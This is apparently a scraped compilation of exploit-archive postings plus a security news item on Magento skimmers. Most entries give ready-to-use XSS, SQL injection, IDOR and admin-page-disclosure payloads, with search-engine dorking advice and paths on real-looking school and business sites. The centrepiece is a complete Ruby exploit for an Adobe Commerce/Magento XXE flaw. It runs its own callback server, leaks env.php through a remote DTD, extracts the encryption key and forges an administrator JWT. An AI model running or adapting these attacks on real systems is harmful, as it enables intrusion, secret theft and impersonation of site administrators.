PPDB ONLINE version 1.3 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : PPDB ONLINE V.1.3  HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://berkas.siap-ppdb.com/                                                                                      |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

PPDB ONLINE 1.3 Administrative Page Disclosure

PHP MaXiMuS version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP MaXiMuS v2.5.2 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://php-maximus.fr/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

PHP MaXiMuS 2.5.2 Cross Site Scripting

NUKE SENTINEL version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : NUKE SENTINEL v2.5.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.ravenphpscripts.com/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

NUKE SENTINEL 2.5.2 Cross Site Scripting

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

eDesign CMS 2.0 Insecure Direct Object Reference

Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.
The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said.
The skimmer is designed to capture all the data into the credit card form on the

Threat Detection / Website Security

Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.

The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said.

The skimmer is designed to capture all the data into the credit card form on the website and exfiltrate the details to an attacker-controlled domain named "amazon-analytic\[.\]com," which was registered in February 2024.

"Note the use of the brand name; this tactic of leveraging popular products and services in domain names is often used by bad actors in an attempt to evade detection," security researcher Matt Morrow said.

This is just one of many defense evasion methods employed by the threat actor, which also includes the use of swap files ("bootstrap.php-swapme") to load the malicious code while keeping the original file ("bootstrap.php") intact and free of malware.

"When files are edited directly via ssh the server will create a temporary 'swap' version in case the editor crashes, which prevents the entire contents from being lost," Morrow explained.

"It became evident that the attackers were leveraging a swap file to keep the malware present on the server and evade normal methods of detection."

Although it's currently not clear how the initial access was obtained in this case, it's suspected to have involved the use of SSH or some other terminal session.

The disclosure arrives as compromised administrator user accounts on WordPress sites are being used to install a malicious plugin that masquerades as the legitimate Wordfence plugin, but comes with capabilities to create rogue admin users and disable Wordfence while giving a false impression that everything is working as expected.

"In order for the malicious plugin to have been placed on the website in the first place, the website would have already had to have been compromised — but this malware could definitely serve as a reinfection vector," security researcher Ben Martin said.

"The malicious code only works on pages of WordPress admin interface whose URL contains the word 'Wordfence' in them (Wordfence plugin configuration pages)."

Site owners are advised to restrict the use of common protocols like FTP, sFTP, and SSH to trusted IP addresses, as well as ensure that the content management systems and plugins are up-to-date.

Users are also recommended to enable two-factor authentication (2FA), use a firewall to block bots, and enforce additional wp-config.php security implementations such as DISALLOW\_FILE\_EDIT and DISALLOW\_FILE\_MODS.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files

Adobe Commerce and Magento Open Source are affected by an XML injection vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. Versions Affected include Adobe Commerce and Magento Open Source 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. This exploit uses the arbitrary file reading aspect of the issue to impersonate a user.

#!/usr/bin/env ruby -W0

require 'bundler'  
Bundler.require(:default)

DEBUG = false  
USE_PROXY = false  
PROXY_ADDR = '127.0.0.1'  
PROXY_PORT = 8080

def debug(msg)  
  puts msg.inspect if DEBUG  
end

def rand_text(length = 8)  
  # random string generator  
  o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten  
  (0...length).map { o[rand(o.length)] }.join  
end

def dtd_param_name  
  @dtd_param_name ||= rand_text()  
end

def ent_eval  
  @ent_eval ||= rand_text()  
end

def leak_param_name  
  @leak_param_name ||= rand_text()  
end

def remote_addr  
  @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}"  
end

def http  
  @http ||= begin  
    http = if USE_PROXY  
             Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)  
           else  
             Net::HTTP.new(@target_uri.host, @target_uri.port)  
           end

    if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})  
      http.use_ssl = true  
      http.verify_mode = OpenSSL::SSL::VERIFY_NONE  
    end

    http.set_debug_output($stderr) if DEBUG  
    http  
  end  
end

def make_xxe_dtd  
  filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php'  
  ent_file = rand_text()  
  %(  
    <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">  
    <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>">  
  )  
end

def xxe_xml_data()  
  param_entity_name = rand_text()

  xml = "<?xml version='1.0' ?>"  
  xml += "<!DOCTYPE #{rand_text()}"  
  xml += '['  
  xml += "  <!ELEMENT #{rand_text()} ANY >"  
  xml += "    <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "  
  xml += ']'  
  xml += "> <r>&#{ent_eval};</r>"

  xml  
end

LIBXML_NOENT = 2  
LIBXML_PARSEHUGE = 524288

def xxe_request()  
  debug('Sending XXE request')

  signature = rand_text().capitalize

  post_data = {  
    "address": {  
      "#{signature}": rand_text(),  
      "totalsCollector": {  
        "collectorList": {  
          "totalCollector": {  
            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {  
              "data": xxe_xml_data(),  
              "options": LIBXML_NOENT|LIBXML_PARSEHUGE  
            }  
          }  
        }  
      }  
    }  
  }.to_json  
  req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods')  
  req.body = post_data  
  req.content_type = 'application/json'  
  # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)'  
  res = http.request(req)

  raise RuntimeError, "Server returned unexpected response" unless res&.code == '400'

  body = JSON.parse(res.body)

  raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature

end

TARGET_USER_ID = 1

USER_TYPE_INTEGRATION = 1;  
USER_TYPE_ADMIN = 2;  
USER_TYPE_CUSTOMER = 3;  
USER_TYPE_GUEST = 4;

def jwt_encode(key, algorithm = 'HS256')  
  def pad_key(key, total_length, pad_char)  
    left_padding = (total_length - key.length) / 2  
    right_padding = total_length - key.length - left_padding  
    pad_char * left_padding + key + pad_char * right_padding  
  end  
  header = {  
    kid: "1",  
    alg: "HS256"  
  }

  payload = {  
    uid: TARGET_USER_ID,    
    utypid: USER_TYPE_ADMIN,  
    iat: Time.now.to_i,  # Token issue time',  
    exp: Time.now.to_i + 10 * 24 * 60 * 60,  # Token expiration time  
  }

  def base64_url_encode(str)  
    Base64.urlsafe_encode64(str).tr('=', '')  
  end

  padded_key = pad_key(key, 2048, '&')

  encoded_header = base64_url_encode(header.to_json)  
  encoded_payload = base64_url_encode(payload.to_json)

  # Create the signature  
  data = "#{encoded_header}.#{encoded_payload}"  
  signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data)  
  encoded_signature = base64_url_encode(signature)

  # Combine the header, payload, and signature to form the JWT  
  "#{encoded_header}.#{encoded_payload}.#{encoded_signature}"

end

def exploit()  
  begin  
    puts "Starting web server..."  
    body = make_xxe_dtd()  
    file_content = nil  
    file_content_reader, file_content_writer = IO.pipe  
    WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240)  
    wbserver_options = {  
      :BindAddress => '0.0.0.0',  
      :Port => @srv_host.port,  
      :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),  
      :AccessLog => [],  
      # :RequestTimeout => 300,       # Increase request timeout  
      # :RequestMaxUriLength => 100240 # Increase max URI length  
    }  
    wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG

    pid = Process.fork do  
      file_content_reader.close

      server = WEBrick::HTTPServer.new(wbserver_options)  
      server.mount_proc '/' do |req, res|  
        if req.path =~ /\.dtd$/  
          res.body = body  
        elsif req.query_string.match(/#{leak_param_name}=(.*)/)  
          file_content = Base64.decode64(Regexp.last_match(1))  
          # puts "Received leaked file content:\n#{file_content}"  
          file_content_writer.puts file_content

        else  
          res.body = 'OK'  
        end  
      end

      trap("INT") do  
        server.shutdown  
        file_content_writer.close  
      end

      server.start  
    end

    sleep(1)  
    xxe_request()  
    file_content_writer.close

    begin  
      # Set a timeout for reading from the pipe  
      Timeout.timeout(5) do  # 5 seconds timeout, adjust as necessary  
        file_content = file_content_reader.read_nonblock(10000)  # Adjust the size as necessary  
      end  
    rescue Timeout::Error  
      puts "Reading from pipe timed out."  
    rescue EOFError  
      puts "End of file reached."  
    ensure  
      file_content_reader.close  
    end

    # Use file_content as needed here  
    if file_content  
      # puts "Successfully read file content:\n#{file_content}"  
      key = file_content.match(/'key' => '(.*)'/)[1]  
      if key  
        debug "Found key: #{key}"  
        jwt = jwt_encode(key)  
        puts "Generated JWT: #{jwt}"  
        puts("Sending request with JWT to coupons endpoint")  
        # Perform authenticated request to a admin endpoint  
        res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"}))  
        raise RuntimeError, "Server returned unexpected response" unless res&.code == '200'  
        puts "Available coupons:"  
        puts JSON.pretty_generate(JSON.parse(res.body))  
      else  
        puts "Failed to extract key from file content."  
      end  
    else  
      puts "Failed to read file content or content is empty."  
    end

    puts "Exploit completed"

  rescue RuntimeError => e  
    puts "#{e.class} - #{e.message}"  
  ensure  
    if pid  
      Process.kill("INT", pid)  
      Process.wait(pid)  
    end  
  end  
end

if __FILE__ == $0  
  @target_uri = URI.parse(ARGV[0])  
  @srv_host = URI.parse(ARGV[1])

  exploit()  
end

Adobe Commerce / Magento Open Source XML Injection / User Impersonation

Xhibiter NFT Marketplace version 1.10.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Xhibiter NFT Marketplace 1.10.2 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /search.php?id=1'%22()%26%25<acx><ScRiPt%20>prompt(915136)</ScRiPt>[+] https://www/127.0.0.1/gatesea.io/search.php?id=1'"()%26%25<acx><ScRiPt >prompt(915136)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Xhibiter NFT Marketplace 1.10.2 Cross Site Scripting

eStore CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : eStore CMS v2.0 Sql injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.2iraq.com/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

eStore CMS 2.0 SQL Injection

Clenix version 1.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Clenix v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : https://www.radiustheme.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /admin/main.php[+] https://www/127.0.0.1/otabucert.co.uk/admin/main.php[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Clenix 1.0 Insecure Direct Object Reference

Candy Redis version 2.1.2 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Tag

#php